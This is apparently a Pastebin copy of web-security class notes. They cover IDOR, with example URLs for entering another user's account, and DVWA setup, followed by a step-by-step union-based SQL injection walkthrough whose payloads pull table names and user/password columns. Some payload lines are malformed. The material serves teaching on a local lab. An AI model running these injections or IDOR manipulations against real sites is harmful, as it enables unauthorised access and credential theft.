Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- SESSION 10
- ==========
- METHODS USED IN WEB APPLICATIONS
- ================================
- 1. GET - It is the method used by web applications which is unsecure and show all the transmitting data from the web application UI to its Database or server. Requests data from a specified resource.
- eg. php?id=1, ?cat=54, ?test=query.
- 2. POST - The method which hides and requests the data from the Database or Server Secretly. eg. twitter.com/login.php
- ----------------------------------------------------------
- INSECURE DIRECT OBJECT REFERENCE
- ================================
- A direct object reference occurs when a developer exposes a reference to an internal implementation object such as a file, directory or a database key. Without an access control check or other protection, Attackers can directly access the unsecured files and configurations and settings which are neither authorized nor validated by the administrator.
- For eg. :
- CHJM Website :
- Accessing into another user -
- www.chjm.org/login/.../php?id=1411 (ALEX)
- www.chjm.org/login/../php?id=1411 ( entered into Logan's Account)
- Accessing into pages which are not authorized to a basic user-
- www.chjm.org/user/../settings/config.html
- www.chjm.org/login/../php?id=logan/settings/config.html
- EG : arvindsharma.com > Login
- arvindsharma.com/account/login.php
- arvindsharma.com/account/user.php?id=1337
- URL > arvindsharma.com
- /account/ > fOLDER
- user.php > Code
- 1337 > Sanjeev Multani
- Kshitij > 1111 > 1337 > Sanjeev's account
- ----------------------------------------------------------
- SENSITIVE DATA EXPOSURE
- =======================
- Many web applications do not properly protect sensitive data such as Names, IDs, Credit Cards details, authentication credentials etc. Attackers may steal or modify such weakly protected data to conduct credit card fraud, identity theft or any other crimes. These Sensitive Data is well aspected to encryption also in which if the data is not encrypted and is in plain text, it will be very easier to get fetched by the attacker or any other individual.
- Types of Sensitive Data
- =======================
- 1. Personal - Names, Address , Contact Numbers etc.
- 2. Confidential - ID,Passwords - Credentials, Aadhar No.
- 3. Financial - Bank Accounts numbers, credit cards, debity cards etc.
- 4. Health Information - Policies etc.
- Demonstration on LVS.
- ----------------------------------------------------------
- DVWA SETUP AND CONFIGURATION
- ============================
- DVWA stands for Damn Vulnerable Web Application, it is PHP MySQL based Web Application which is a organisational based understanding Web Application for OWASP TOP 10 like LVS.
- STEPS
- =====
- Copy zip file into C:\xampp\htdocs
- Right click the zip file, click on extract here
- start xampp server, start apache and mysql
- Go to the directory of dvwa in “htdocs”, navigate to the folder config, open the config.php file and make password=””(empty).
- Open the browser, goto 127.0.0.1/dvwa
- It will show you a message “Click here to create the Database”.
- After Clicking, your Database have been created in “127.00.0.1/phpmyadmin” which will lists out all the Databases.
- Go through the Instruction Page of LVS and then start learning through it.
- ----------------------------------------------------------
- OWASP A1. INJECTIONS
- =====================
- UNION BASED SQL INJECTION
- =========================
- UNION BASED SQLI is a type of attack vector in which a attacker inputs some kind of SQL Synatxes in a Input Method of a Web Application UI, And he/she can be able to communicate and access the Database.
- The attacker extracts the data through inputting some SQL Queries into the Web Application UI and henced get the “Juicy” Data from Database -> Tables -> Columns -> Rows
- TERMINOLOGIES
- =============
- 1. Information Schema : It has all of the data regarding every databases, tables, columns and every other detail of a Database. It is considered as the mother of Informations in Database.
- 2. --+ : Everything written with --+ would be acted like a SQL QUERY.
- 3. # : Everything entered after # will not be considered.
- 4. database() - name of the database
- 5. version() - version of the database.
- Target - http://127.0.0.1/dvwa/vulnerabilities/sqli/
- STEPS - For SQLi always recommend to use Firefox, as special symbols and spaces does not get converted into URL encode
- STEPS
- ======
- Step 1: To find the GET Method/Parameter
- eg. php?id=1
- ?cat=24
- ?test=query
- Trying to click each and every possible link or will give inputs to the search boxes of GET Method.
- “http://127.0.0.1/dv18/vulnerabilities/sqli/?id=1&Submit=Submit#”
- Step 2: Check if my site is Vulnerable or not to Union Based SQLI
- ?id=1'
- php?id=1'
- If we get an error that means my website is vulnerable to Union Based SQLI.
- It will give - “http://127.0.0.1/dv18/vulnerabilities/sqli/?id=1' &Submit=Submit#
- You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''1''' at line 1 “
- Step 3: To check the number of columns present in the database
- order by 100--+
- order by 200--+
- order by 300--+
- Until we get an error of “Unknown Order Clause”.
- Eg. 127.0.0.1/dv18/vulnerabilities/sqli/?id=1' order by 1--+&Submit=Submit#
- 127.0.0.1/dv18/vulnerabilities/sqli/?id=1' order by 2--+&Submit=Submit#
- 127.0.0.1/dv18/vulnerabilities/sqli/?id=1' order by 3--+&Submit=Submit#
- Unknown column '3' in 'order clause'
- Step 4: To Union Select the columns which are present in the Database and is Vulnerable
- union select 1,2--+
- http://127.0.0.1/dv18/vulnerabilities/sqli/?id=1' union select 1,2--+ &Submit=Submit#
- Step 5: Extracting Information from Database
- - database()
- - version()
- - union select version(),2--+
- - union select 1,version()--+
- - union select all 1,version()--+ : 10.1.25-MariaDB
- - union select all 1,database()--+ : dvwa
- Step 6: Calling the Mother of Database - information_schema
- = Extracting Table Names
- - union select all 1,table_names from information_schema.tables--+
- http://127.0.0.1/dv18/vulnerabilities/sqli/?id=1' union select all 1,table_name from information_schema.tables--+&Submit=Submit#
- = After Selecting a Juicy Table, Extracting data of that table :
- - column_name, information_schema.columns
- - union select all 1, columns_name from information_schema.columns where table_name="users"--+
- = To get the data from columns (user, password)
- - union select user,password from users--+
- - http://127.0.0.1/dv18/vulnerabilities/sqli/?id=1' group_concat(user,0x0a,password),2 from users--+
- And we will get the Juicy Data.
- -------------------------------------------------------------------------------
- TESTING WEBSITES
- ================
- 1. http://demo.testfire.net/
- 2. http://testphp.vulnweb.com/
- TASKS
- =====
- 1. What is the Meaning of % in URL?
- 2. What is WAF?
Add Comment
Please, Sign In to add comment